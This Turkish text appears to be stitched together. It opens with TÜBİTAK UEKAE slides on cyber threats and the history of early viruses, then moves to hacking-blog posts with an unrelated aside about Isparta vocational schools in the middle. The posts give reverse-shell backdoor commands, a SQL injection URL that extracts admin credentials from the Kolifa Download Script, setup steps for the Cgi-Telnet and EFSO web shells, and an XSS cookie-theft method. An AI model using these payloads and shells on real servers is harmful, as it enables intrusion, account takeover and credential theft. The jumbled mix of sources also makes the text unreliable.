Olasi Tehditler

Günümüzden gelecege…
• Zararli yazilimlar daha gelismis kriptografik ve polimorfik özelliklere sahip olacak.
– Tespitleri daha zor olacak.
• Dostunuza düsman, düsmaniniza dost olabilirsiniz! (Botnet)
• Siber saldirilar Türkiye’yi daha çok etkileyecek.
– Internet sirketlerinin orani bugünden çok daha fazla olacak.
– Kamu hizmetlerinin büyük kismi Internet ortamina tasinacak.

Günümüzden gelecege…
• 70’li yillarda bilim-kurgu romanlarina konu olan virüsler 80’li yillarda tehdit olmaya basladi.
– Bugünün hayalleri yakinda gerçek olacak.
• Çok uzak olmayan gelecekte ülkelerin siber savas yapan “daha büyük” düzenli siber ordulari olacak. (küçük çapta var)
• Kablosuz ve Hücresel sistem kullanimlarinin artmasiyla izole sistem kalmayacak.
– Siber saldirilar evimizdeki esyalara kadar girecek. (basladi ama yayginlasmadi)

Günümüzden gelecege…
• Günümüzde güvenli sayilan güvenlik algoritmalarinin eksponansiyel kirilma süreleri zaman içerisinde polinom zamana düsecek.
• Ulusal güvenlik ürünleri ve ulusal güvenlik degerlendirmelerinin yapilmasi çok daha önemli olacak.

TÜBITAK UEKAE Bilgi Güvenligi Çalismalari

TÜBITAK UEKAE Bilgi Güvenligi Faaliyet Alanlari
• Ag Güvenligi
• Kriptografik Analiz ve Tasarim
• Milli Kripto Cihazlari (Hat, Ses, ISDN, IP)
• Milli Açik Anahtar Altyapisi (PKI)
• EMC (Elektromanyetik Uyumluluk)
• TEMPEST
• Adli Analiz Cihazlari

Ag Güvenligi - OKTEM
• Güvenli Sistem Tasarimi ve Kurulumu
• Güvenlik Testleri ve Denetlemeleri
• Bilgi Güvenligi Egitimleri
• Bilgisayar Güvenlik Olaylarina Müdahale (CERT)
• Bilgi Güvenligi Yönetim Sistemleri
• ISO/IEC 27001, CoBIT, ITIL
• Risk Yönetimi
• Penetrasyon Testleri
• Kod Analizi
• Is Sürekliligi Yönetim Sistemleri
• Ortak Kriterler Degerlendirmeleri
• Haberlesme Güvenligi (COMSEC) Degerlendirmeleri

Bazi çarpici sonuçlar
• Sapphire/Slammer Worm (2003), internet üzerinde açikliga sahip olan bilgisayarlarin %90’ina 10 dakika içinde bulasabildi.
• av-comperatives.org tarafindan 8 adet polimorfik virüs için yayinlanan son degerlendirmeye göre sektördeki 13 antivirüs yazilimindan 8 tanesi en az 1 virüsün tespitinde basarisiz oldu.
• Mali zararlar en çok virüsler, yetkisiz erisim, dizüstü bilgisayar hirsizligi ve kisisel bilgi hirsizligindan kaynaklanmaktadir.

Siber Saldiri Motivasyon, Hedef ve Yöntemleri
Motivasyon Hedef Yöntem
Siber Terör
Politik degisiklikler Masum kullanicilar Bilgiayar-tabanli siddet ve yikim
Hactivism
Politik degisiklikler Karar vericiler Saldiri
Cracking
Ego, Kisisel düsmanlik Sahislar, Firmalar,
Kamu Sistemleri
Saldiri, Açiklik kullanimi
Siber Suç Ekonomik fayda Sahislar, Firmalar
Sahtekarlik, ID çalma, Santaj, Saldiri, Açiklik kullanimi Siber Casusluk Ekonomik fayda Sahislar, Firmalar, Kamu Sistemleri Saldiri, Açiklik kullanimi
Devletler seviyesinde bilgi savaslari
Politik veya askeri fayda
Altyapi, Askeri bilesenler, Kamu sistemleri Saldiri, Açiklik kullanimi, Fiziksel saldirilar

Siber suçlar artik güncel haberlerin bir parçasi

Estonya örnegi
• Heykelin kaldirilmasinin Rusya tarafindan kinanmasi (27 Nisan 2007) ardindan Tallinn’de ayaklanmalar ve yagmalar basladi.
• 27-29 Nisan 2007 tarihleri arasinda baslangiç seviyesi siber saldirilar
– Bazi web sayfalarinin ele geçirilmesi
– Küçük DDOS saldirilari
– Ulusal e-posta sunucular ve haber portallarina baslangiç seviyesi SPAM saldirilari

Estonya örnegi
• 30 Nisan-18 Mayis tarihleri arasinda daha organize saldirilar
– Ulusal bilgi sistemleri, Internet hizmet saglayicilari ve bankalara yönelik daha genis katilimli ve koordineli DDOS saldirilari
– Daha çok sayida SPAM mesajlari
• Ülkedeki internet sistemi çökme noktasina getirilmistir.

Neden bu kadar önemli ?
• Estonya nüfus 1.3 Milyon.
– 1 milyondan fazla digital kimlik karti mevcut
– Mayis 2007’den itibaren cep telefonlarinda digital kimlik tutulmaktadir.
• Nüfusun %66 oraninda Internet’i yogun olarak kullanmaktadir.
• Evlerin %55 inde kisisel bilgisayar (PC) bulunmaktadir.
• Vergi beyanlari %80 oraninda Internet üzerinden yapilmaktadir.
• Bankacilik islemleri %97 oraninda Internet üzerinden yapilmaktadir.
• Saglik kayitlari %100 oraninda dijital ortamda tasinmaktadir.
• Ülke çapinda hemen her yerde kablosuz Internet hizmeti sunulmaktadir ve bu erisim genel olarak sifresizdir.
• Kurulan her 4 yeni sirketten 1 tanesi Internet üzerinde kurulmaktadir. Bu saldirilarla Internet sistemi degil Estonya zarar görmüstür!

Ayrica…
• Yagmalara katilan vatandaslarin fotograflari polis tarafindan web sayfasinda isimleriyle teshir edildi. Bu fotograflar hem haksiz rekabet(reklam) hem de kisiselgizlilik açisindan hükümeti zora soktu.

Ilk Virüsler – The CREEPER
• The Creeper virüsü ilk olarak ARPANET’te 1970’li yillarin basinda tespit edilmistir.
• Tenex isletim sistemi yoluyla yayilmis ve
bilgisayara bagli modemi diger bilgisayarlara baglanmak ve onlari enfekte etmek için kullanmistir.
• “I’M THE CREEPER : CATCH ME IF YOU CAN.“ mesajini ekranda göstermistir.
• Ardindan ortayan çikan ve Creeper’i temizleyen Reaper adli programi da ayni kisinin yazdigi dedikodu olarak ortada dolasmistir.

Ilk Virüsler - Elk Cloner
• Elk Cloner vahsi ortamda (yazildigi bilgisayar sistemi veya laboratuar disinda) yayilmis olan ilk bilgisayar virüsü olarak bilinir. Fakat bu dogru degildir.
• 1982’de Apple II sistemleri için 15 yasinda lise ögrencisi olan Rich Skrenta tarafindan yazilmistir.
• Elk Cloner, Apple II’nin isletim sistemine enfekte olarak yayilmaktadir.
• Bilgisayar, enfekte bir floppy diskten basladiginda virüsün bir kopyasi otomatik olarak çalismaya baslar ve ardindan disk erisimini gözetler. Enfekte olmamis baska bir disk bilgisayara yerlestirildiginde virüs kendisini o diske kopyalayacaktir.
• Diger ilk virüsler gibi Elk Cloner da herhangi bir zarar vermiyordu. Kendisini sabit bir track bölgesine yazdigi için sadece DOS imaji içeren disketlere zarar verebilirdi.
• Yaptigi sey enfekte olan disketle bilgisayarin 50’inci defa açilmasinda su kisa siiri göstermekti:
– Elk Cloner: The program with a personality
– It will get on all your disks
– It will infiltrate your chips
– Yes it’s Cloner!
– It will stick to you like glue
– It will modify RAM too
– Send in the Cloner!
• Virüsün yazilis amaci rahatsizlik yaratmakti.
• Yayilis sebebi ise Kullanicilarin sürücüde disk bulundurarak bilgisayarlarini baslatmamalari gerektigini bilmemeleri ve o günlerde Virüs Tarayicilarinin olmamasiydi. Virüs bir miktar ugrasiyla elle temizlebiliyordu.

Morris Solucani
• Morris Solucani veya Internet Solucani, Internet yoluyla yayilan ilk solucanlardan birisidir. Ilk solucan oldugu tahmin edilmektedir. Basinin ciddi miktarda dikkatini çekmistir.
• Universitesinde ögrenci olan, Robert Tappan Morris tarafindan yazilmis ve MIT’ten 2 Kasim, 1988 tarihinde Internet’e birakilmistir.
• Virüsün MIT’ten birakilmasinin sebebi solucanin Cornell’den geldiginin anlasilmamasi içindir.

Solucanin Mimarisi
• Solucanin yazarina göre Morris solucani zarar vermek amaçli degil, Internet’in büyüklügünü tahmin etmek amaçliydi.
• Gözden kaçirilan bir bilgisayarin birçok kere enfekte olmasi ve her enfeksiyonin ayri bir proses olarak çalisarak bilgisayari çalisamayacak kadar yavaslatmasiydi.
• Morris solucani, Unix sendmail, Finger, rsh/rexec içindeki bilinen açikliklari ve zayif parolalari kullanarak yayilmistir.

Hata
• Solucani, zararsiz bir bilgi toplama çalismasindan etkili bir servis disi birakma saldirisina çeviren hata yayilma mekanizmasindaydi.
• Solucan yeni bilgisayara saldirdiginda bilgisayarin zaten enfekte olup olmadigina bakmiyordu.
• Zaten böyle bir mekanizma olsaydi; solucan enfekte etmek istediginde solucanin bilgisayarda çalistigini gösteren bir proses, solucana karsi koruma kolaylikla saglayabilirdi.

Solucanin Etkileri
• Solucan 6000 Unix makineye bulasti. O günkü tahminlere göre
Internete sadece 60,000 makine bagliydi. Böylece Morris solucani tüm Internetin yüzde onuna bulasmis oldu.
• ABD, Genel Muhasebe Ofisine (GAO) göre zarar 10M–100M$ arasindaydi.
• Gene Spafford, acil durum müdahale çalismalarini koordine etmek için Phage ePosta listesini olusturdu.
• 1986 Computer Fraud and Abuse Act’i ihlal etttigi gerekçesiyle 3 yil gözalti, 400 saat kamu servisi ve 10,050 $ cezaya çarptirildi.
• Morris solucani, o günlerde hem Interneti büyük ölçüde servis disi biraktigi hem de psikolojik açidan Internetin güvenligi ve güvenirligi algisini yiktigi için “Büyük Solucan” olarak da adlandirilmaktadir.

Morris Solucanindan Sonra
• Olaydan sonra, Internet üzerinde bilgisayar güvenlik olaylarina tepkinin nasil iyilestirilebilecegi konusunda bir toplanti düzenlendi.
• Toplanti sonucunda Internet güvenlik problemleri ile ilgili tek bir iletisim noktasi olmasi gerektigine ve bu noktanin güvenlik bilgileri için güvenilir bir kaynak olmasi önerildi.
• Öneriye karsilik CERT Coordination Center, Internet’te meydana gelen güvenlik olaylarina müdahale etmek amaciyla kuruldu.

nsT BackConnect Backdoor v1.0 serverda backdoor açmaya ve serverlara backconnet sağlamaya yarar. C dilinde yazılmıştır onun için kullanmadan önce derlemelisiniz. nsT BackConnect Backdoor ‘un kullanımı şöyle ;

Usage:
* client: nc -lp 9999
* server: ./backconnect client_ip 9999

nsT BackConnect Backdoor v1.0 Download

Download scriptine ihtiyacım vardı ilk rastladığım script Kolifa.net Download Script 1.2 idi. Guvenliğini falan kontrol ettim indir.php  dosyasında id parametresinden sql injection saldırısına maruz kaldığını gördüm.

Source :

<?php
//*****************************
//*****************************
//********** KOLİFA ***********
//********** DOWNLOAD *********
//********** SCRİPT ***********
//*****************************
//****** www.kolifa.net *******
//*****************************
ini_set('error_reporting', E_ALL^E_NOTICE);
include("ayarlar.php");
require('fonksiyon.php');
$baglanti    = mysql_connect($dbhost,$dbkullanici,$dbsifre) or die("Veritabanına bağlanılamadı.");
$sec        = mysql_select_db($db);
$dwkodu=strip_tags($_GET['id']);
$act=strip_tags($_GET['act']);
?>
Gördüğünüz üzere 15. satırda script_tags fonksiyonu yalnız kullanılmış html kodların çalışmasını engellemek için fakat güvenlik için yetersiz. Sql injection attack ile database den veri çekilebiliyor. Dahil ettiğimiz sql sorgusundan sonra sayfada çıkan “Buraya Tıklayın” ın bağlantı adresinde çektiğiniz veri çıkacaktır.

Example Sql Inject Code :

indir.php?id=-1/**/union/**/select/**/concat(admin_adi,0x3a,admin_sifresi)/**/from/**/yonetici/*

Demo Site : Kolifa.net Download Script 1.2 Demo

Download : Kolifa.net Download Script 1.2 Download

r57, c99 vs türevleri shell’ler ile servera backconnect yapılmadığı durumlarda kullanılabilecek backconnect tool. Servera upload ettikten sonra chmod 777 verip çalıştırabilirsiniz.
Kullanımı : perl dc.pl [ip no] [port]  o anki kendi ip numaranız ve modem de açık olan portu kullanmanız gerekmekte.

ConnectBack Backdoor Shell vs 1.0 Download

Yalvaç Meslek Yüksek Okulu da buraya bağlı bir myo yalvaçta biraz daha teknik bilimler ön planda

ek olarak Uluborlu Meslek Yüksekokulu da bu üniversitenin diğer bölümlerinden diğer myo larıda baya iyi durumdalar mesala
Sütçüler Prof.Dr.Hasan GÜRBÜZ Meslek Yüksekokulu Bu okuldada eğitim iyi düzeyde..
Ben Tercihlerimde Isparta Senirkent Meslek Yüksek Okulu vermiştim ama gelmedi gelmemesi o kadarda bozmadı
Süleyman Demirel Üniversitesi Keçiborlu Meslek Yüksekokulunu daha önce görmüştüm bizim
Isparta Gelen Dost Meslek Yüksek Okuluunda arkadaşım okuyor oda asıl olarak eğirdir gölüne yakın olan
Isparta Eğirdir Meslek Yüksek Okulu Bu okul göle yakın olmasıyla iyi biraz ama diğer okullarda iyi mesala
Isparta Atabey Meslek Yüksek Okulu neyse Hepsine Başarılar Diliyorum inş
Şarkikaraağaç Meslek Yüksek okulu ndayken Kurtlar Vadisi Pusu yu Kaçırmam Kurtlar Vadisi Pusunun Bölümlerini full izle rim

Cgi-Telnet ile Safe mode : On ( on secure ) yani güvenlik modunun açık olduğu serverlarda komut çalıştırmanıza yarar (execute commands). Cgi-Telnet i kullanabilmeniz için serverda perl kurulu ve çalışır durumda olması gerek. Script (cgi-telnet) in ve kullanıldığı dizinin chmodu 755 olmalıdır. Script arayüzünü görüntülemek için ilk önce şifre girmeniz gerekiyor. Cgi-Telnet’in 45. satırında $Password = “changeme”; changeme yazan kısma istediğiniz şifreyi yazın. Scripti Windows serverda çalıştıracak olursanız Cgi-Telnet’in 48. satırında bulunan $WinNT = 0; kodun 0 olan kısmı 1 yapıp kaydedin ($WinNT = 1;) . Daha sonra http://www.[site]/cgi-telnet.pl olarak web browserınızda açıp işlemlerinizi yapmak kalıyor.

Cgi-Telnet Download

EFSO , Windows Serverlarda kullanabileceğiniz FSO script türünün en iyisi. Bir çok özellik bulunduruyor; regedit, cmd,dosya-klasör işlemleri,mail bomber sayabileceğimiz özelliklerden bir kaçı. .TR siteler kullanılmaması için kendini imha etme özelliğide mevcuttur.

Script yazarının dilinden;
Biz bir FSO & MSWCTools & XMLHTTP Component lerini kullanarak Server a site üzerinden HTTP protocolunden erişim sağlandığında, Size Server ın tüm imkanlarından yararlanmanız için, Permission, şifre, gizli tüm içeriklere direk ulaşma, yada aşma gibi özelikleri olan. Server ı çökertmeye , hatta kaynaklarını son damlasına kullanabilen SaVSaK.CoM adına hizmet veren Bir Canavar yarattık.

EFSO Download

Xss açıkları hakkında temel oluşturacak basit xss yönetimin anlatıldığı 2 videoyu paylaşacağım sizlerle.  İlk videoda XSS açığının bulunduğu sayfa tespit ediliyor. İkinci XSS videosunda ise bulunan açığın lehimize nasıl çevirebileceğimiz anlatılmış. PM. yolu ile gönderilen xss linki karşı tarafın tıklaması sonucu Cookie Sniffer aracılığıyla saldırganın eline geçmekte ve cookie editör leriyle gelen cookieleri kendikileriyle değiştirmekte ve karşı tarafın accountunu ele geçirmekte.

XSS Video Download